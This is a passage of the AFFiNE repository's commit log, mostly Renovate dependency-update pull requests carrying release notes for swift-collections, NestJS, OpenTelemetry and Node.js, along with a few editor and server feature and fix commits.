Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.60.0...v1.61.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.60.0...v1.61.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-15 03:15:18 +08:00
DarkSky 6f55548661 fix(editor): improve tests stability (#14971)
#### PR Dependency Tree


* **PR #14971** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Tests**
  * Improved shape selection reliability in edge case testing scenarios
* Enhanced rich text editor focusing logic with better synchronization
for inline editor state validation

2026-05-15 03:14:52 +08:00
renovate[bot] c39fa1ff2d chore: bump up apple/swift-collections version to from: "1.5.0" (#14969)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [apple/swift-collections](https://redirect.github.com/apple/swift-collections) | minor | `from: "1.4.1"` → `from: "1.5.0"` |

---

### Release Notes

<details>
<summary>apple/swift-collections (apple/swift-collections)</summary>

###
[`v1.5.0`](https://redirect.github.com/apple/swift-collections/releases/tag/1.5.0):
Swift Collections 1.5.0

[Compare
Source](https://redirect.github.com/apple/swift-collections/compare/1.4.1...1.5.0)

This feature release supports Swift toolchain versions 6.0, 6.1, 6.2,
and 6.3. It includes the following new features and bug fixes:

##### Debugging enhancements

The package now defines LLDB data formatters for `RigidArray`. The
formatters are emitted into the executable binary, and they are
automatically loaded by LLDB. We expect to implement formatters for
(many) more types in subsequent releases.

##### New stable APIs

- `RigidArray` and `UniqueArray` now conform to `Equatable` when their
element type is `Equatable`. This conformance requires a Swift 6.4 or
later toolchain (it relies on [SE-0499][SE-0499] generalizations of
`Equatable`/`Hashable` to support noncopyable conforming types).
- `RigidArray` and `UniqueArray` gained an `isTriviallyIdentical(to:)`
operation, which reports whether two instances share their underlying
storage allocation. This does not require the element type to be
`Equatable`, and it works with noncopyable elements.
- [`BitSet`][BitSet] gained a `makeIterator(from:)` shortcut for
starting iteration at (or after) a specific member, avoiding a linear
scan from the start of the set.
- [`OrderedDictionary`][OrderedDictionary] gained a
`replaceElement(at:withKey:value:)` operation that replaces the
key-value pair at a given index. The new key is allowed to equal the
existing key at that index (in which case only the value is updated).

[BitSet]:
https://swiftpackageindex.com/apple/swift-collections/documentation/bitcollections/bitset

[OrderedDictionary]:
https://swiftpackageindex.com/apple/swift-collections/documentation/orderedcollections/ordereddictionary

[SE-0499]:
https://redirect.github.com/swiftlang/swift-evolution/blob/main/proposals/0499-equatable-hashable-comparable-noncopyable.md

##### Experimental hashed containers (`UnstableHashedContainers` trait)

The Robin-Hood-hashed `UniqueSet`, `RigidSet`, `UniqueDictionary`, and
`RigidDictionary` types in the `BasicContainers` module continue to
evolve behind the `UnstableHashedContainers` package trait. This release
brings a number of correctness fixes and performance improvements:

- Faster removals, with better `maxProbeLength` maintenance to avoid
probe-length bloat.
- Small tables are now scrambled to avoid degenerate patterns on common
key distributions.
- A fast-path shortcut for insertions into under-utilized tables.
- Fixes to the insertion algorithm and to
`RigidDictionary.updateValue(forKey:with:)` (the latter exhibited
undefined behavior on removals).
- `RigidSet.insert(maximumCount:from:)` no longer spuriously reports a
capacity overflow due to incorrect accounting.
- The `UnstableHashedContainers` trait can now be enabled independently
of `UnstableContainersPreview`.

These types remain source-unstable for now.

##### Experimental sorted collections (`UnstableSortedCollections` trait)

The `SortedCollections` module's [`SortedSet`][SortedSet] has gained the
following additions:

- `SortedSet` now supports value-range subscripts for the full variety
of standard range expression types, `ClosedRange`, `PartialRangeFrom`,
`PartialRangeThrough`, and `PartialRangeUpTo`.
- `SortedSet.firstIndex(after:)` and `SortedSet.lastIndex(before:)`
return the index to the nearest member following or preceding a given
value.

This release also fixes several underlying B-tree bugs that were
surfaced by these additions.

These types remain source-unstable; they have known API deficiencies
that will need to be addressed before they ship.

[SortedSet]:
https://redirect.github.com/apple/swift-collections/tree/main/Sources/SortedCollections/SortedSet

##### Experimental container protocols (`UnstableContainersPreview` trait)

The `ContainersPreview` module's protocol hierarchy and associated types
continue to be developed. Several constructs have been renamed to follow
Swift Evolution proposals in flight.

| Old name                  | New name                    |
| ------------------------- | --------------------------- |
| `struct Box<T>`           | `struct UniqueBox<Value>`   |
| `struct Borrow<Target>`   | `struct Ref<Target>`        |
| `struct Inout<Target>`    | `struct MutableRef<Target>` |
| `Producer.ProducerError`  | `Producer.Failure`          |
| `Producer.generateNext()` | `Producer.next()`           |
| `Producer.skip(upTo:)`    | `Producer.skip(by:)`        |

For `UniqueBox`, `Ref` and `MutableRef`, there are deprecated
typealiases for the old names, preserving source compatibility.

Other changes to the experimental container model:

- `Container.Index` no longer needs to conform to `Comparable`. This
allows linked lists to become containers.
- `RigidArray`, `UniqueArray`, `RigidDeque`, and `UniqueDeque` now
conform to the container protocols.
- Added `Producer.collect(into:)` for collecting a producer's output
into a `RangeReplaceableContainer`.
- Added `BorrowingIteratorProtocol.copy()` for turning a borrowing
iterator into a producer.
- Added `filter` and `map` overloads for `BorrowingIteratorProtocol`,
`Producer`, and `Drain`.
- `BorrowingSequence.first` was removed.
- `BorrowingSequence`, `BorrowingIteratorProtocol` and their
requirements have temporarily gained trailing underscores to avoid
naming conflicts with the (provisional) protocol definition in the
Standard Library. We expect these definitions to be removed when these
protocols officially become part of the stdlib.

The protocol-based APIs in `ContainersPreview` now require a Swift 6.4
or later toolchain. `UniqueBox` is source-stable, therefore it continues
to require Swift 6.2.

##### Notable bug fixes

- `HashTreeCollections`: Fixed an invariant violation that could be
triggered by some operations on `TreeSet`/`TreeDictionary`.
- `_RopeModule`: Fixed an infinite loop when hashing the UTF-8 view of a
multi-chunk big substring.
- `BitCollections`: Fixed a bogus precondition in
`BitArray.insert(repeating:count:at:)`; fixed `BitSet.isSubset(of:
Range<Int>)` to correctly examine elements above the range's upper word.
- `HeapModule`: Fixed `Heap.insert(contentsOf:)` to use a wrapping
multiply in its Floyd-heuristic computation; added a missing bounds
assertion in `Heap._UnsafeHandle.swapAt(_:with:)`.
- `OrderedCollections`: Fixed `OrderedSet` crash on negative capacity
values; minor fixes in `_HashTable.UnsafeHandle`.
- `DequeModule`: Fixed sizing issue in
`UniqueDeque.replace(removing:addingCount:initializingWith:)`; fixed a
missing argument validation in
`RigidDeque.nextMutableSpan(after:maximumCount:)`;
`RigidDeque.consume(_:consumingWith:)` now closes the resulting gap
before returning; added zero-count fast-paths; replace/prepend
operations taking a `Collection` now verify that the source's count
matches its contents.
- `BasicContainers`: Fixed an overallocation issue in
`UniqueArray.replace(removing:copying:)`; fixed a partial-initialization
correctness issue in
`RigidArray.replace(removing:consumingWith:addingCount:initializingWith:)`.

#### What's Changed

- Add tests that build the ContainersPreview module by
[@natecook1000](https://redirect.github.com/natecook1000) in
[#610](https://redirect.github.com/apple/swift-collections/pull/610)
- Add a workflow that performs a CMake build by
[@natecook1000](https://redirect.github.com/natecook1000) in
[#612](https://redirect.github.com/apple/swift-collections/pull/612)
- Align `BorrowingSequence` implementation with proposal by
[@natecook1000](https://redirect.github.com/natecook1000) in
[#609](https://redirect.github.com/apple/swift-collections/pull/609)
- Bump
swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml
from 0.0.8 to 0.0.9 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[#615](https://redirect.github.com/apple/swift-collections/pull/615)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.8 to 0.0.9 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[#614](https://redirect.github.com/apple/swift-collections/pull/614)
- Fix lifetime requirements rigidly enforced in the latest nightlies by
[@lorentey](https://redirect.github.com/lorentey) in
[#617](https://redirect.github.com/apple/swift-collections/pull/617)
- Track array proposal by
[@lorentey](https://redirect.github.com/lorentey) in
[#619](https://redirect.github.com/apple/swift-collections/pull/619)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.9 to 0.0.10 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[#620](https://redirect.github.com/apple/swift-collections/pull/620)
- OrderedSet: Don't crash on negative capacity values by
[@thisismanan](https://redirect.github.com/thisismanan) in
[#622](https://redirect.github.com/apple/swift-collections/pull/622)
- \[ContainersPreview] Don’t require `Container.Index` to conform to
`Comparable` by [@lorentey](https://redirect.github.com/lorentey)
in
[#623](https://redirect.github.com/apple/swift-collections/pull/623)
- Adjust experimental workflows by
[@lorentey](https://redirect.github.com/lorentey) in
[#626](https://redirect.github.com/apple/swift-collections/pull/626)
- [BitSet] Add `BitSet.makeIterator(from:)` by
[@lorentey](https://redirect.github.com/lorentey) in
[#627](https://redirect.github.com/apple/swift-collections/pull/627)
- \[BasicContainers] RigidSet.insert(maximumCount:from:): Fix spurious
capacity overflow caused by incorrect accounting by
[@lorentey](https://redirect.github.com/lorentey) in
[#628](https://redirect.github.com/apple/swift-collections/pull/628)
- \[BasicContainers]
RigidArray.replace(removing:consumingWith:addingCount:initializingWith:):
Fix correctness issue with partial initialization by
[@lorentey](https://redirect.github.com/lorentey) in
[#629](https://redirect.github.com/apple/swift-collections/pull/629)
- \[BasicContainers] UniqueArray.replace(removing:copying): Fix
overallocation issue by
[@lorentey](https://redirect.github.com/lorentey) in
[#630](https://redirect.github.com/apple/swift-collections/pull/630)
- Fix \_trim(first:) returning wrong buffer region by
[@FranzBusch](https://redirect.github.com/FranzBusch) in
[#631](https://redirect.github.com/apple/swift-collections/pull/631)
- Bump swiftlang/github-workflows/.github/workflows/soundness.yml from
0.0.10 to 0.0.11 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[#625](https://redirect.github.com/apple/swift-collections/pull/625)
- \[OrderedCollections] Add
OrderedDictionary.replaceElement(at:withKey:… by
[@inju2403](https://redirect.github.com/inju2403) in
[#616](https://redirect.github.com/apple/swift-collections/pull/616)
- \[ContainersPreview] Producer.ProducerError ⟹ Producer.Failure by
[@lorentey](https://redirect.github.com/lorentey) in
[#634](https://redirect.github.com/apple/swift-collections/pull/634)
- fix: reserveCapacity DocC link in RigidArray by
[@manojmahapatra](https://redirect.github.com/manojmahapatra) in
[#633](https://redirect.github.com/apple/swift-collections/pull/633)
- \[BasicContainers, DequeModule]: Assorted fixes by
[@lorentey](https://redirect.github.com/lorentey) in
[#632](https://redirect.github.com/apple/swift-collections/pull/632)
- \[Debugging] Add lldb data formatter for RigidArray by
[@kastiglione](https://redirect.github.com/kastiglione) in
[#607](https://redirect.github.com/apple/swift-collections/pull/607)
- \[HashTreeCollections] Fix invariant violation in
\_HashNode.\_regularNode by
[@lorentey](https://redirect.github.com/lorentey) in
[#635](https://redirect.github.com/apple/swift-collections/pull/635)
- \[BitCollections] Fix small issues by
[@lorentey](https://redirect.github.com/lorentey) in
[#637](https://redirect.github.com/apple/swift-collections/pull/637)
- \[HeapModule, SortedCollections] Assorted tool-assisted fixes and
adjustments by [@lorentey](https://redirect.github.com/lorentey)
in
[#639](https://redirect.github.com/apple/swift-collections/pull/639)
- \[BasicContainers] Enable APIs scheduled to ship in 1.5.0 by
[@lorentey](https://redirect.github.com/lorentey) in
[#641](https://redirect.github.com/apple/swift-collections/pull/641)
- \[BasicContainers] Fix copypasta in `UniqueArray.edit`’s docs by
[@lorentey](https://redirect.github.com/lorentey) in
[#642](https://redirect.github.com/apple/swift-collections/pull/642)
- Rename `Box` to `UniqueBox`; align API surface with SE-0517 by
[@lorentey](https://redirect.github.com/lorentey) in
[#640](https://redirect.github.com/apple/swift-collections/pull/640)
- Bump
swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml
from 0.0.9 to 0.0.11 by
[@dependabot](https://redirect.github.com/dependabot)\[bot] in
[#624](https://redirect.github.com/apple/swift-collections/pull/624)
- Use the defines from traits directly by
[@FranzBusch](https://redirect.github.com/FranzBusch) in
[#644](https://redirect.github.com/apple/swift-collections/pull/644)
- \[ContainersPreview] `struct Borrow` ⟹ `struct Ref` by
[@lorentey](https://redirect.github.com/lorentey) in
[#643](https://redirect.github.com/apple/swift-collections/pull/643)
- \[ContainersPreview] `struct Inout` ⟹ `struct MutableRef` by
[@lorentey](https://redirect.github.com/lorentey) in
[#646](https://redirect.github.com/apple/swift-collections/pull/646)
- 1.5.0 release preparations by
[@lorentey](https://redirect.github.com/lorentey) in
[#647](https://redirect.github.com/apple/swift-collections/pull/647)

#### New Contributors

- [@thisismanan](https://redirect.github.com/thisismanan) made
their first contribution in
[#622](https://redirect.github.com/apple/swift-collections/pull/622)
- [@FranzBusch](https://redirect.github.com/FranzBusch) made
their first contribution in
[#631](https://redirect.github.com/apple/swift-collections/pull/631)
- [@inju2403](https://redirect.github.com/inju2403) made their
first contribution in
[#616](https://redirect.github.com/apple/swift-collections/pull/616)
- [@manojmahapatra](https://redirect.github.com/manojmahapatra)
made their first contribution in
[#633](https://redirect.github.com/apple/swift-collections/pull/633)
- [@kastiglione](https://redirect.github.com/kastiglione) made
their first contribution in
[#607](https://redirect.github.com/apple/swift-collections/pull/607)

**Full Changelog**:
<https://github.com/apple/swift-collections/compare/1.4.1...1.5.0>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-15 01:02:39 +08:00
DarkSky 3416de1e4d fix(server): missing root cert (#14970)
#### PR Dependency Tree


* **PR #14970** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
  * Updated TLS library dependencies with pinned version constraints
    across multiple packages
  * Removed `tls-rustls` feature from sqlx configurations in backend and
    frontend packages
  * Removed unused `sqlx` dependency from mobile native package
  * Refined HTTPS client configuration with embedded certificate roots and
    added validation test

2026-05-15 01:02:07 +08:00
renovate[bot] d9cebdfc95 chore: bump up nestjs (#14968)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.20/11.1.21?slim=true) |
| [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.20/11.1.21?slim=true) |
| [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.20/11.1.21?slim=true) |
| [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.20/11.1.21?slim=true) |
| [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) | [`11.4.2` → `11.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.4.2/11.4.3) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fswagger/11.4.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fswagger/11.4.2/11.4.3?slim=true) |
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.20` → `11.1.21`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.20/11.1.21) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.21?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.20/11.1.21?slim=true) |

---

### Release Notes

<details>
<summary>nestjs/nest (@nestjs/common)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@nestjs/core)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@nestjs/platform-express)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/nest (@nestjs/platform-socket.io)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

<details>
<summary>nestjs/swagger (@nestjs/swagger)</summary>

###
[`v11.4.3`](https://redirect.github.com/nestjs/swagger/compare/11.4.2...0d79a3c9dea89236314609f8b18ec98b12c18692)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.2...11.4.3)

</details>

<details>
<summary>nestjs/nest (@nestjs/websockets)</summary>

###
[`v11.1.21`](https://redirect.github.com/nestjs/nest/compare/v11.1.20...983dd52c4927753be3421162fc43e4fde8d3fcde)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.20...v11.1.21)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 23:39:14 +08:00
renovate[bot] 97d9ae3183 chore: bump up @opentelemetry/semantic-conventions version to v1.41.1 (#14962)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@opentelemetry/semantic-conventions](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.40.0` → `1.41.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsemantic-conventions/1.41.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsemantic-conventions/1.40.0/1.41.1?slim=true) |

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js
(@opentelemetry/semantic-conventions)</summary>

###
[`v1.41.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ed6bd6d5f3a1f68b65ae25b1a8aae9c285ae83de...013c60085b84351a4c1e4e4f79e3dd67c56661cd)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 18:25:55 +08:00
DarkSky c8cdc488db feat(server): entitlement primitive (#14964)
#### PR Dependency Tree


* **PR #14964** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **New Features**
  * Added entitlement resolution to validate licenses and derive plan,
    quotas, expiry and flags.
  * Introduced persistent quota/entitlement state for users and workspaces
    with legacy sync behavior.
  * Real-time quota-state operations and change events for monitoring
    usage.

* **Chores**
  * Updated workspace dependencies to add cryptography/hash crates.

* **Tests**
  * Added native entitlement tests covering validation, quantity handling,
    and signature/expiry cases.

2026-05-14 18:25:03 +08:00
Jachin 542da0b347 feat(editor): improve latex editing support (#14924)
## Summary
- support converting selected text into inline LaTeX equations
- support turning text blocks into LaTeX equation blocks
- add equation entries to editor toolbars while keeping inline equation
with text formatting actions

## Tests
- yarn tsc -b blocksuite/affine/inlines/latex/tsconfig.json
blocksuite/affine/blocks/note/tsconfig.json
blocksuite/affine/blocks/root/tsconfig.json
blocksuite/affine/rich-text/tsconfig.json
blocksuite/affine/widgets/keyboard-toolbar/tsconfig.json --pretty false
- git diff --check origin/canary...HEAD

## Summary by CodeRabbit

* **New Features**
  * Equation block support with conversion from existing blocks.
  * Inline LaTeX insertion added to the inline formatting toolbar.
  * Equation action added to the keyboard toolbar; Equation blocks
    searchable via math/equation/latex aliases.

* **Improvements**
  * Inline LaTeX editor opens and syncs more reliably; selection/convert
    flow preserves distinct LaTeX values when converting in reverse order.

* **Tests**
  * New e2e tests for inline LaTeX conversions and value preservation.

2026-05-14 11:56:54 +08:00
renovate[bot] 7280fe33bc chore: bump up Node.js to v22.22.3 (#14961)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.2` → `22.22.3` |

---

### Release Notes

<details>
<summary>nodejs/node (node)</summary>

###
[`v22.22.3`](https://redirect.github.com/nodejs/node/releases/tag/v22.22.3):
2026-05-13, Version 22.22.3 'Jod' (LTS), @marco-ippolito

[Compare
Source](https://redirect.github.com/nodejs/node/compare/v22.22.2...v22.22.3)

##### Commits

-
\[[`4f780905c5`](https://redirect.github.com/nodejs/node/commit/4f780905c5)]
- **crypto**: fix potential null pointer dereference when
BIO\_meth\_new() fails (Nora Dossche)
[#&#8203;61788](https://redirect.github.com/nodejs/node/pull/61788)
-
\[[`4a09efb947`](https://redirect.github.com/nodejs/node/commit/4a09efb947)]
- **crypto**: update root certificates to NSS 3.121 (Node.js GitHub Bot)
[#&#8203;62485](https://redirect.github.com/nodejs/node/pull/62485)
-
\[[`e4c0d99839`](https://redirect.github.com/nodejs/node/commit/e4c0d99839)]
- **deps**: update timezone to 2026a (Node.js GitHub Bot)
[#&#8203;62164](https://redirect.github.com/nodejs/node/pull/62164)
-
\[[`0226c8dd7a`](https://redirect.github.com/nodejs/node/commit/0226c8dd7a)]
- **deps**: update simdjson to 4.5.0 (Node.js GitHub Bot)
[#&#8203;62382](https://redirect.github.com/nodejs/node/pull/62382)
-
\[[`e742ab748c`](https://redirect.github.com/nodejs/node/commit/e742ab748c)]
- **deps**: update sqlite to 3.51.3 (Node.js GitHub Bot)
[#&#8203;62256](https://redirect.github.com/nodejs/node/pull/62256)
-
\[[`73cac0571a`](https://redirect.github.com/nodejs/node/commit/73cac0571a)]
- **deps**: update amaro to 1.1.8 (Node.js GitHub Bot)
[#&#8203;62151](https://redirect.github.com/nodejs/node/pull/62151)
-
\[[`ae5c162b93`](https://redirect.github.com/nodejs/node/commit/ae5c162b93)]
- **deps**: update amaro to 1.1.7 (Node.js GitHub Bot)
[#&#8203;61730](https://redirect.github.com/nodejs/node/pull/61730)
-
\[[`b819cb9977`](https://redirect.github.com/nodejs/node/commit/b819cb9977)]
- **deps**: update amaro to 1.1.6 (Node.js GitHub Bot)
[#&#8203;61603](https://redirect.github.com/nodejs/node/pull/61603)
-
\[[`bbcce09dc7`](https://redirect.github.com/nodejs/node/commit/bbcce09dc7)]
- **deps**: update sqlite to 3.52.0 (Node.js GitHub Bot)
[#&#8203;62150](https://redirect.github.com/nodejs/node/pull/62150)
-
\[[`22ff2d81ce`](https://redirect.github.com/nodejs/node/commit/22ff2d81ce)]
- **deps**: update simdjson to 4.3.1 (Node.js GitHub Bot)
[#&#8203;61930](https://redirect.github.com/nodejs/node/pull/61930)
-
\[[`f49b51d75c`](https://redirect.github.com/nodejs/node/commit/f49b51d75c)]
- **deps**: update acorn-walk to 8.3.5 (Node.js GitHub Bot)
[#&#8203;61928](https://redirect.github.com/nodejs/node/pull/61928)
-
\[[`1a5cec0d49`](https://redirect.github.com/nodejs/node/commit/1a5cec0d49)]
- **deps**: update acorn to 8.16.0 (Node.js GitHub Bot)
[#&#8203;61925](https://redirect.github.com/nodejs/node/pull/61925)
-
\[[`d339497688`](https://redirect.github.com/nodejs/node/commit/d339497688)]
- **deps**: update nbytes to 0.1.3 (Node.js GitHub Bot)
[#&#8203;61879](https://redirect.github.com/nodejs/node/pull/61879)
-
\[[`3ff8ffd459`](https://redirect.github.com/nodejs/node/commit/3ff8ffd459)]
- **deps**: remove stale OpenSSL arch configs (René)
[#&#8203;61834](https://redirect.github.com/nodejs/node/pull/61834)
-
\[[`b8ddbc1e9a`](https://redirect.github.com/nodejs/node/commit/b8ddbc1e9a)]
- **deps**: update llhttp to 9.3.1 (Node.js GitHub Bot)
[#&#8203;61827](https://redirect.github.com/nodejs/node/pull/61827)
-
\[[`ffda97afd4`](https://redirect.github.com/nodejs/node/commit/ffda97afd4)]
- **deps**: update googletest to
[`2461743`](https://redirect.github.com/nodejs/node/commit/2461743991f9aa53e9a3625eafcbacd81a3c74cd)
(Node.js GitHub Bot)
[#&#8203;62484](https://redirect.github.com/nodejs/node/pull/62484)
-
\[[`79aa32cf4f`](https://redirect.github.com/nodejs/node/commit/79aa32cf4f)]
- **deps**: update googletest to
[`73a63ea`](https://redirect.github.com/nodejs/node/commit/73a63ea05dc8ca29ec1d2c1d66481dd0de1950f1)
(Node.js GitHub Bot)
[#&#8203;61927](https://redirect.github.com/nodejs/node/pull/61927)
-
\[[`b6957e13b6`](https://redirect.github.com/nodejs/node/commit/b6957e13b6)]
- **deps**: update archs files for openssl-3.5.6 (Node.js GitHub Bot)
[#&#8203;62629](https://redirect.github.com/nodejs/node/pull/62629)
-
\[[`3a27669063`](https://redirect.github.com/nodejs/node/commit/3a27669063)]
- **deps**: upgrade openssl sources to openssl-3.5.6 (Node.js GitHub
Bot) [#&#8203;62629](https://redirect.github.com/nodejs/node/pull/62629)
-
\[[`d568a1bb53`](https://redirect.github.com/nodejs/node/commit/d568a1bb53)]
- **deps**: upgrade npm to 10.9.8 (npm team)
[#&#8203;62463](https://redirect.github.com/nodejs/node/pull/62463)
-
\[[`ec11f3c1d5`](https://redirect.github.com/nodejs/node/commit/ec11f3c1d5)]
- **deps**: V8: backport
[`85b3900`](https://redirect.github.com/nodejs/node/commit/85b390089e51)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`08609712ed`](https://redirect.github.com/nodejs/node/commit/08609712ed)]
- **deps**: V8: backport
[`1b27e46`](https://redirect.github.com/nodejs/node/commit/1b27e4674f11)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`dcc60d5ab2`](https://redirect.github.com/nodejs/node/commit/dcc60d5ab2)]
- **deps**: V8: backport
[`9997fc0`](https://redirect.github.com/nodejs/node/commit/9997fc013952)
(Thibaud Michaud)
[#&#8203;62783](https://redirect.github.com/nodejs/node/pull/62783)
-
\[[`1d1f4451fb`](https://redirect.github.com/nodejs/node/commit/1d1f4451fb)]
- **deps**: V8: cherry-pick
